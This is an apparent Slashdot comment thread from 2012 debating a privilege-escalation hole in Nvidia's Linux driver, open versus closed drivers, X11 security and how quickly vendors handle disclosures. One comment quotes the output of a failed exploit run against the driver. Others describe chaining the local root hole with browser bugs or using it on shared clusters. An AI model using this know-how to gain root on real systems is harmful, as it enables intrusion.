But before the zealots complain about closed drivers, they might try coming up with some decent opensource A/V players that are fully featured and actually work.

Not to mention, for years zealots have been deriding ATI cards, then i finally switch, and linus gets a hardon for nvidia.

Re:I'll take my chances

[konaya]

Or better yet: nVidia could actually make their driver open source. That way, we'll have all the bells and whistles, and when a security flaw gets known the community can patch it without nVidia's involvement.

Re:I'll take my chances

Two things:

1. Everybody who knows enough about the guts of nVidia hardware to write HW accelerated drivers for it is employed by nVidia already

2. There are probably huge patent, trade secret and NDA issues even if they wanted to release the source.

Also, http://xkcd.com/619/

Re:I'll take my chances

[Desler]

So you're going to foot the legal bills for auditing all the source for copyrights and patents, plus pay for all the costs associated with rewriting any and all licensed code that won't allowed to be open sourced, and finally finance all the extra work needed to make it into mainline? You realize it's not as simple for NVIDIA as creating a public git repo and uploading the source code, right?

Re:I'll take my chances

That's because on Linux, you have exactly one option - NVIDIA. Period.

You have ATI and their shitty binary blob. You have ATI and their epically shitty open source driver. You have Intel which has really nice drivers but the hardware simply isn't comparable. And then you have NVIDIA which supported Linux a full decade before ATI. And generally, their drivers not only work, but work really well.

None of that means NVIDIA is perfect. In fact, anyone who says NVIDIA is perfect, I'll happily give them a mirror so they now what an idiot looks like. Just the same, for 3D on Linux, you still have only one option. And frankly, its still pretty damn good, albeit not perfect.

Re:I'll take my chances

(undo moderation misclick)

good thing

[slashmydots]

Good thing all the outside the box type virus writers are busy writing malware for Macs so they don't have time to focus on Linux lol.

Re:Who did he send it to at Nvidia?

/steps on the soap box. Heh, Microsoft the one with the most security holes of the bunch and you are throwing these statements around? They have holes from years ago that they haven't fixed and just come back with the "upgrade your OS" line of B.S. And UAC is supposed to make Windows Vista/7 secure, that is a joke.

I fully understand that it takes a while for companies to stamp out bugs but I think companies have become far too lax on their bug squashing. The people that buy their products become their beta testers and this to me is just wrong. I do software testing and I know from 20 yrs of testing that companies will downgrade bugs even if they are considered critical by the testers just to get a product out the door on time. They will then try to minimize the damage until they can put out the next version with a hopeful fix in them.

I think we need to make some of these companies responsible for their horrible code and lack of testing. /steps off the soap box

meh

[ThorGod]

Not too long ago Intel had a firmware exploit in their processors.

I still appreciate the effort Nvidia's made to support their cards on OSes such as linux and BSD over the years. I'll still only EVER buy nvidia cards because of their driver support.

Here's hoping they keep trucking along at it, even with what Linus' said and now this.

Re:meh

[John+Hasler]

I bought one Nvidia card because of their wonderful Linux support. I'll never buy another.

Re:meh

[interval1066]

Um... Intel...? Just sayin', nVidia isn't your only choice for Linux support.

Re:meh

I never bought a graphics card. Should I have?

Re:meh

[MikeBabcock]

Okay, Intel makes drivers. What they don't make is video cards that work worth a damn.

He meant to say, "of the video cards that can play games with decent frame rates, NVidia has the best drivers on Linux."

Re:meh

[gman003]

Even if you've never bought a discrete card, you've used one, integrated either onto the motherboard, into the northbridge, or on the processor itself.

One of my earliest computers had an ATI Rage 3D right on the motherboard. Later, I used one with an nVidia chipset, which had (I believe) a 7000-series GPU integrated with the northbridge. My current laptop has an Intel GPU right on the processor (it also has a discrete nVidia card). Unless your computer literally does not have any video capability, it has some sort of graphics "system". Quite possibly an Nvidia chip (they're the largest, followed by AMD, Intel, PowerVR, and a few others (I think Matrox is still around)).

Re:meh

No. Discrete graphics cards are for bird brains.

Re:meh

Go Intel. I'll never return to nVidia or ATI. Intel's graphics are actually comparable now to the low end nVidia. Plus Intels cards support video. It's not all better in nVidia land. Intel's drivers are completely free. Unlike nVidia and ATI who work against free software. AMD only releases a partial driver. It doesn't even partially work without the non-free component.

Re:meh

[Desler]

If it's integrated into the motherboard or the north bridge or the processor it is not a 'discrete' card. A discrete card implies it is NOT integrated into anything.

Re:meh

[oudzeeman]

thats what he is saying. Even if you haven't bought a discrete card, you've still bought a video card (that was integrated into your motherboard)

Re:meh

[gman003]

And most importantly, you've used drivers for that graphics processor. Which could be exploited like this one.

Re:meh

Yeah I believe what he meant was that it's the only GOOD option. AMD/ATI's drivers have always been shit and Intel isn't good for much more than web-browsing and hi-def Youtube videos.

Re:meh

Not necessarily. Though not all PC BIOSes will boot without a graphics card (onboard or not), if you have one that will, there's still the option of a serial console, or even a pure network server.

Real(tm) servers used to have serial console only.

f**k you

[human+spam+filter]

obligatory http://www.youtube.com/watch?v=_36yNWw_07g

privilege escalation hole?

[paxprobellum]

"privilege escalation hole" sounds like something after "friends with benefits". Just saying.

For limited values of "you"

It needs a local execution method (either another exploit or a tricked user) and access to /dev/nvidia0.

So, for example, even if you exploit a web service to execute this on a suitable machine, you still won't get anything as long as web service's user doesn't have permissions on /dev/nvidia0.

Worst of all, it still needs downloading and compiling sources. WTF, Linux? When are we going to get all the software available prepackaged and regularly updated from the repository? Other OSes handle it well, no need for "wget && patch && gcc" to get this working, no need for sudo and sometimes even no need for any actions from user AT ALL, simply visit a page and it just works!

Re:For limited values of "you"

[Nerdfest]

When are we going to get all the software available prepackaged and regularly updated from the repository?

That's a fairly half-hearted troll. Most Linux distros have package management and multi-source software repositories that make iOS, Metro, and OS X look like the limited attempts at platform lock-in that they really are.

Re:For limited values of "you"

Exactly. I'm rather hard pressed to think of a distro that /Doesn't? have Some form of package repo that would make windows package management cry, aside from extremely specialized distros, of course (Captcha: Applaud)

Re:For limited values of "you"

[Bert64]

Well, the presence of a local escalation hole makes other vulnerabilities more serious... Just some of the possible scenarios:

An HPC cluster with multiple non root users, could exploit this to get root...
Someone using linux as a workstation, exploited via a userland hole (eg browser bug), this nullifies the advantage of running as an unprivileged user.

Sure it's not as serious as a remote root hole, but it can still be a useful hole for a hacker.

Re:For limited values of "you"

Don't worry, There is enough exploits in games, that will have access to /dev/nvidia0 (for OpenGL DRI to work), that it won't be a problem getting an attack platform. And with Steam being ported to Lunix, 100's of more exploit vectors will soon be available.

Re:

[Fwipp]

Especially if you're referring to a Pinto.

Re:Who did he send it to at Nvidia?

[ZeroSumHappiness]

I didn't say Windows was perfect, just that if you send a (crank) security exploit to Microsoft they review it. They may not fix it. They may say the best that you can do is upgrade, but they know whether or not it's a real hole. (At least, that's the policy.)

Won't work on 64 bit

[*] IDT offset at 0xffffffff81962000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81962dc0)
[*] Enhancing gate entry...
[ ] Failed!

So who here runs a secure X11 with any driver?

X11 has NEVER been secure its ridiculous to try and point the finger at Nvidia and this is why they have not cared for a month. Its a favorite interview question I use on *NIX applicants- "So tell me, how do you secure X11?". Usually this question gets some laughs and a nice way to break the ice. Seriously though, what is the alternative here? The Ford Escape catches on fire but would you turn down a Ford GT? Probably not and the same goes for graphics acceleration- are you going to turn down that fire-breathing graphics card in your hot little hands? Probably not. If someone gets into your X11 box at that level there is a problem with your network not the Linux box.

Re:So who here runs a secure X11 with any driver?

[PenquinCoder]

"So tell me, how do you secure X11?"

Get rid of it. Use Wayland.

Re:So who here runs a secure X11 with any driver?

[serviscope_minor]

Get rid of it. Use Wayland.

I really hope you are joking. Please tell me you do not seriously believe this...

Re:So who here runs a secure X11 with any driver?

[ThorGod]

X11 has NEVER been secure its ridiculous to try and point the finger at Nvidia and this is why they have not cared for a month.

I probably knew this at some point. Sounds like a good reason to keep X11 off of your servers, and have X11 only on your workstations. (What would be a reason to have a gui on a unix server..I don't know.)

Re:So who here runs a secure X11 with any driver?

[serviscope_minor]

(What would be a reason to have a gui on a unix server..I don't know.)

As someone inexperienced in such matters installing a complex network configuration (for me) involving multiple cards, bonded links and a private subnet on one end, the third time I lost network connectivity due to some mistake, I decided it was easiest to install a GUI on the machine and configure it locally.

One of many

[jandrese]

The graphics driver is both monstrously large and operates at a very low level, there are going to be tons and tons of security problems with it when people start seriously looking at it. As John Carmak put it: I agree with Microsoft’s assessment that WebGL is a severe security risk. The gfx driver culture is not the culture of security.

Only a month notice?

[gr8_phk]

It appears that this has been known to Nvidia for at least a month.

At normal software companies this would probably go through a process like:
1) Confirmation of the problem
2) Determine severity
3) Assign a release to fix it by
4) Have someone fix it
5) Verify the fix
6) Ship it with the next release
In addition, one may want to look around for related problems and fix those too. Since it is a security issue, I would hope that a fix makes it into the next driver release AFTER the one that is in process. Or perhaps hurried into the one that is in process if it won't delay too long. I don't think a month is really that long for a company that size to go without a fix. Upon reading the summary I honestly thought the last word was going to be "year" not "month", in which case a fix would be long overdue.

Re:Only a month notice?

[FranTaylor]

The process you describe can be done in a week, it sure doesn't take a month

Nvidia has released on a week's notice in the past.

Re:Only a month notice?

Depending on the specific details of a particular bug, step 2 can take from moments to days, and steps 4 & 5 can take anywhere from minutes to weeks.

I make no claims as to the timelines involved in this particular instance, except to say that if you're going to claim it "can be done in a week", you'll need to be able to cite some evidence to support it.

Re:Only a month notice?

Yes, but doesn't it kind of depend on the level of work required to implement a fix? A month is not much time to troubleshoot something that is highly complicated.

Use Windows (Sore:200,000, Parent is an Amature)

Pssst..... Amature.

CAPTCHA = muddlers

It might have been patched already...

[tlambert]

I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

Sure, it's be patched, and you could probably apply the patch locally, but it wouldn't be in the official repository yet. And then you get to wait for the review process, where someone tells you how they would have done it differently, if they only had the time or the interest, but since you didn't do it that way, you need to rewrite your patch. This is pretty much true of most Open Source communities, which tend not to take rough consensus and working code, and then clean up the cosmetic stuff later.

Then you get to wait for it to move from "development" to "beta" to "stable" before it actually makes it into an official release version. In most Open Source communities, this whole thing can take months.

In general, I'd have to say Open Source doesn't win over closed in this case, and I say that as a long time Open Source person.

Re:It might have been patched already...

For an open source person yuu know quite little of security bug fixing processes.

Fixing, testing and delivering non-trivial bugs can take weeks. However, the things you mentioned as hindrances don't really come to play for security fixes at all, not in any project I've wrked in.

Maybe we could concentrate on actual problems instead of making shit up.

Re:It might have been patched already...

[bill_mcgonigle]

In most Open Source communities, this whole thing can take months.

Go ahead and look up a bug report for any recent vulnerability in a major linux distribution and you'll see this isn't true. Most critical security bugs get pushed to stable within a few days, perhaps a week, of being publically announced.

Now, it is true that often they sit on private disclosure bugs until a CVE or public exploit is made available. That's poor resource allocatio, IMO, but fixes for wild exploits simply aren't something that people fight over.

Re:It might have been patched already...

[tlambert]

Sorry, but getting a fix into a stable source tree, and getting it installed on systems are two very different things. Chrome OS does a pretty decent job of this, but unless you are talking about a commercially backed Open Source OS distribution with automatic updates, most systems sit there with vulnerable software for years before they are updated/reinstalled/retired.

This is exactly the same as the situation in the closed source community.

Re:It might have been patched already...

[bill_mcgonigle]

but unless you are talking about a commercially backed Open Source OS distribution with automatic updates, most systems

Yes, that's what most people run. Last measure I saw, Ubuntu + Fedora made up about 50,%, SUSE 10%, Gentoo about 10% (OK, not commercial, but very fast with automatic updates) and then Debian and all the others the last quarter or so.

So your complaint is that the last 15% or so where they don't have an update engine don't get updates? Or that Debian has a slow process? Trying to understand ...

Is this vulnerability remotely exploitable?

I guess this is the most important question, otherwise users shouldn't worry about it. Does anybody know?

Re:Use Windows (Sore:200,000, Parent is an Amature

He may indeed be an amateur, but at least he didn't misspell anything, let alone a ridiculously common and simple word.

distro wars or idiot vs adept.

[OrangeTide]

If people keep insisting on abusing their watered down idiot's distro, then crying when it doesn't work. We're going to keep telling them to use the right tool for the job!

Re:distro wars or idiot vs adept.

[Interfacer]

Is it really too much to ask that a basic piece of hardware is supported at a basic level, by a mainstream distro?
I'm not even talking about 3D acceleration or complex setups. The guy was trying to configure a basic desktop.

Why should something like screen resolution and basic display functionality still require tinkering and a different configuration that is different between distros?
Don't go off on the user and his 'crying when his idiot distro doesn't work'. It's 2012. If distros still can't agree on a standard way to do trivial things like that, something is wrong, and it's not the user.

Re:distro wars or idiot vs adept.

[OrangeTide]

Some distros try to simplify things for the user, but get it wrong. Feel free to complain to Canonical. They are the ones trying to beat a new path away from the rest of us. This stuff Just Works on Debian, the closest thing to Ubuntu.

ps - is a PC assembled from parts from 30+ vendors and at least 4 different firmware vendors really "a basic piece of hardware" ?

Nope

[FranTaylor]

TwinView doesn't work in nouveau

Re:Nope

[hobarrera]

TwinView is the name of nvidia's implementation of multimonitor support.
If you need multiple monitores, nouveau supports this.

Anyway, my point was that users needing monochrome/EGA/CGA have no need for nvidia's binary blob.

Re:Nope

[nullchar]

Correct, as TwinView is proprietary nvidia, but Xinerama should work fine.

Put the whole driver on the video card!

[FranTaylor]

There's plenty of horsepower on the card

Platform-agnostic api, super-duper-thin wrapper libaries

It also solves all the whinging about binary blobs

Should probably post to the support foru- oh, wait

[ExecutorElassus]

Perhaps not entirely coincidentally, "one month" is about the amount of time that nVidia's web forum - comically also the only route for reporting bugs, and found here - has been shut down due to a DDoS attack.

Probably not the best way to follow up their snippy response to Linus Torvald bashing their Linux support.

Re:Who did he send it to at Nvidia?

[RedDeadThumb]

Amen! I had a hell of a time trying to report a bug in the ATI driver as well. And how do you report a bug to netflix? All company web front pages should have big button that says "report bug". People are out here doing free QA for them and they aren't taking advantage. Plus I actually get pissed when I cannot report a bug. And I know I am not alone here, so it is bad PR.

They never even replied.

[pavon]

Yeah, one month can be pretty short notice to actually fix, test, and release some more complicated bugs. But in this cas,e Nvidia never even responded to people who notified them of the exploit. If I reported a security hole and they acknowledged it and let me know the were working on fixing it, then I would give them far more than a month to fix it. But if they just ignored me, then I'd release it after a month too.

Other graphics issues

[Penurious+Penguin]

There has been a mysterious bug causing total system freezes for many thousands of Mint users. A lot were attributed to Muffin/Cinnamon and allegedly solved for those particular users, but many others (like me, using Mate) seem to be graphics related and they persist. After updating to kernel 3.3.6 from 3.2.6, the issue seemed to go away. But after upgrading to 3.4.6-generic, it seems it may be back. The only thing close to a consensus is that it is graphics related. Many report that disabling nvidia drivers solves the issue, but my intel is affected too. I am not savvy enough to know, but whatever the hell is going on, it's pretty bad. Having your system completely crash every other hour is a genuinely terrible bug, or suite of them.

Ubuntu 12

[phorm]

Don't have a problem with ubuntu in general, but migration to 12.04 is kinda sucky.
I prefer to keep my homedir in a seperate partition for upgrades like this. That way I can add the new OS on another partition, install, and see how scary the update is...

RMS & Linus agree!

Down with proprietary drivers!

Whooosh...

... is the sound of status messages flying by on the terminal as I run "apt-get install nvidia-cve-2012-xxxx-exploit-base nvidia-cve-2012-xxxx-exploit-rootshell"

Re:Who did he send it to at Nvidia?

[FormOfActionBanana]

There is a good broker service for this. Tipping Point's Zero day initiative. Register, submit your vulnerability, they research it, contact the vendor, and pay you for your 0day finding.

Re:Who did he send it to at Nvidia?

(Posting anonymous blabla but I work for one of the better known companies that have had their fair share of humiliating public abuse of exploits)

If someone, anyone, tags me anywhere in any communication platform I use notifying me of a security problem I consider it to be my job to pass it on to the relevant person(s) on the inside. And I'm a manager even, not a software dev.